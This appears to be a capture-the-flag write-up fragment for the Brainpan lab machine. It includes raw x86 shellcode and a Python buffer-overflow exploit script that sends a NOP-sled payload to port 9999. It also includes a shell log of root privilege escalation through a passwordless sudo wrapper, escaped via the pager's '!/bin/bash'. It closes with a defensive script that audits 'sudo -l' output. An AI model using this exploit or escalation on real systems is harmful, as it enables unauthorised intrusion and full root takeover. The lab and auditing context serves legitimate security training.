"\xb8\x82\x74\xa2\x14\xda\xc1\xd9\x74\x24\xf4\x5a\x29\xc9"
"\xb1\x12\x31\x42\x12\x83\xea\xfc\x03\xc0\x7a\x40\xe1\xf5"
"\x59\x73\xe9\xa6\x1e\x2f\x84\x4a\x28\x2e\xe8\x2c\xe7\x31"
"\x9a\xe9\x47\x0e\x50\x89\xe1\x08\x93\xe1\xfb\xe2\x9f\xc4"
"\x93\xf0\x5f\x33\xd7\x7c\xbe\x8b\x71\x2f\x10\xb8\xce\xcc"
"\x1b\xdf\xfc\x53\x49\x77\x91\x7c\x1d\xef\x05\xac\xce\x8d"
"\xbc\x3b\xf3\x03\x6c\xb5\x15\x13\x99\x08\x55";
import sys, socket

# Same layout as before: 524 bytes of filler, the 4-byte return address, a 32-byte NOP sled,
# then the Linux x86 payload generated above.
buffer = b"A" * 524 + b"\xf3\x12\x17\x31" + b"\x90" * 32
payload2 = (b"\xb8\x82\x74\xa2\x14\xda\xc1\xd9\x74\x24\xf4\x5a\x29\xc9"
            b"\xb1\x12\x31\x42\x12\x83\xea\xfc\x03\xc0\x7a\x40\xe1\xf5"
            b"\x59\x73\xe9\xa6\x1e\x2f\x84\x4a\x28\x2e\xe8\x2c\xe7\x31"
            b"\x9a\xe9\x47\x0e\x50\x89\xe1\x08\x93\xe1\xfb\xe2\x9f\xc4"
            b"\x93\xf0\x5f\x33\xd7\x7c\xbe\x8b\x71\x2f\x10\xb8\xce\xcc"
            b"\x1b\xdf\xfc\x53\x49\x77\x91\x7c\x1d\xef\x05\xac\xce\x8d"
            b"\xbc\x3b\xf3\x03\x6c\xb5\x15\x13\x99\x08\x55")

print("Sending payload...")
payload = buffer + payload2 + b'\r\n'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('10.10.x.x', 9999))
s.send(payload)
s.close()
puck@brainpan:/home/puck$ sudo -l
sudo -l
Matching Defaults entries for puck on this host:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User puck may run the following commands on this host:
(root) NOPASSWD: /home/anansi/bin/anansi_util
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util
sudo /home/anansi/bin/anansi_util
Usage: /home/anansi/bin/anansi_util [action]
Where [action] is one of:
- network
- proclist
- manual [command]
puck@brainpan:/home/puck$ /home/anansi/bin/anansi_util network
/home/anansi/bin/anansi_util network
bash: /home/anansi/bin/anansi_util: Permission denied
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util network
sudo /home/anansi/bin/anansi_util network
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue state UNKNOWN
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc pfifo_fast state UP qlen 1000
link/ether 02:46:b1:a1:5f:0b brd ff:ff:ff:ff:ff:ff
inet 10.10.80.44/16 brd 10.10.255.255 scope global eth0
inet6 fe80::46:b1ff:fea1:5f0b/64 scope link
valid_lft forever preferred_lft forever
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util proclist
sudo /home/anansi/bin/anansi_util proclist
'unknown': unknown terminal type.
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util manual
sudo /home/anansi/bin/anansi_util manual
No manual entry for manual
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util manual ls
sudo /home/anansi/bin/anansi_util manual ls
No manual entry for manual
WARNING: terminal is not fully functional
- (press RETURN)!/bin/bash
!/bin/bash
root@brainpan:/usr/share/man# id
id
uid=0(root) gid=0(root) groups=0(root)
root@brainpan:/usr/share/man#
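The escalation above works because of two properties visible in the `sudo -l` output: the wrapper runs as root without a password, and nothing stops it from launching child programs, so when its `manual` action hands off to man and a pager, the pager's `!` escape yields a root shell. The following is an added example, not part of the writeup: a small parser for `sudo -l` output that flags those properties. The sample text is constructed in the shape of the output printed on this host, with two extra entries added to show a safe case and a worst case. `NOEXEC` is the real sudoers tag that blocks exec from the invoked command (it is implemented via LD_PRELOAD, so it only helps for dynamically linked binaries); the wording of the findings is this example's own.

```python
import re
from typing import Dict, List

# Constructed sample in the format of `sudo -l`; the first entry mirrors the page.
SAMPLE_SUDO_L = """\
Matching Defaults entries for puck on this host:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User puck may run the following commands on this host:
    (root) NOPASSWD: /home/anansi/bin/anansi_util
    (root) NOEXEC: /usr/bin/less
    (ALL) ALL
"""

# "(runas) TAG: TAG: command" -- tags are optional and there may be several.
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$")
SYSTEM_PREFIXES = ("/usr/", "/bin/", "/sbin/")


def parse_sudo_l(text: str) -> List[Dict]:
    """Return the command entries from `sudo -l` output as dicts (runas, tags, cmd)."""
    entries = []
    in_commands = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_commands = True
            continue
        if not in_commands:
            continue  # still inside the Defaults section
        m = ENTRY_RE.match(line)
        if not m:
            continue
        tags = [t.rstrip(":") for t in m.group("tags").split()]
        entries.append({"runas": m.group("runas").strip(), "tags": tags, "cmd": m.group("cmd")})
    return entries


def audit_entry(entry: Dict) -> List[str]:
    """Findings for one entry; an empty list means nothing stood out."""
    findings = []
    cmd = entry["cmd"]
    if "NOPASSWD" in entry["tags"]:
        findings.append("NOPASSWD: no credential check before privileged execution")
    if cmd == "ALL":
        findings.append("ALL: unrestricted command set")
        return findings
    if "NOEXEC" not in entry["tags"]:
        findings.append("no NOEXEC: the command may spawn child programs (pagers, editors, shells)")
    if not cmd.startswith(SYSTEM_PREFIXES):
        findings.append("command outside system binary directories: check ownership and write permissions")
    if "*" in cmd:
        findings.append("wildcard in command: argument injection risk")
    return findings


if __name__ == "__main__":
    for e in parse_sudo_l(SAMPLE_SUDO_L):
        print(f"({e['runas']}) {' '.join(e['tags'])} {e['cmd']}")
        for f in audit_entry(e):
            print("   -", f)
```

On the page's own entry the audit reports all three of NOPASSWD, missing NOEXEC, and a command outside the system paths; the `/usr/bin/less` line with NOEXEC produces no findings, which is the shape a hardened entry should have. The check is heuristic: a wrapper that is itself safe still needs review of what it executes, and NOEXEC should be verified by running the command and attempting a shell escape in a test environment.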